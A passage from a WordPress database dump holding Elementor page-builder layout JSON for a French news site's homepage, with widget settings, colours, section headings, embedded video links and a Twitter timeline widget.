fset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#fd0249\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"title_font_size\":{\"unit\":\"px\",\"size\":20}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":52},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"350\",\"category_bg_color\":\"#4a00b4\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"3k7dn06\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":35},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"140\",\"category_bg_color\":\"#e2db00\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\",\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_read\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ff6600\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#0099f4\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2404,770,'_elementor_version','0.4'),(2405,770,'_elementor_css','a:3:{s:4:\"time\";i:1509372017;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(2407,771,'_elementor_edit_mode','builder'),(2408,771,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#fd0249\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"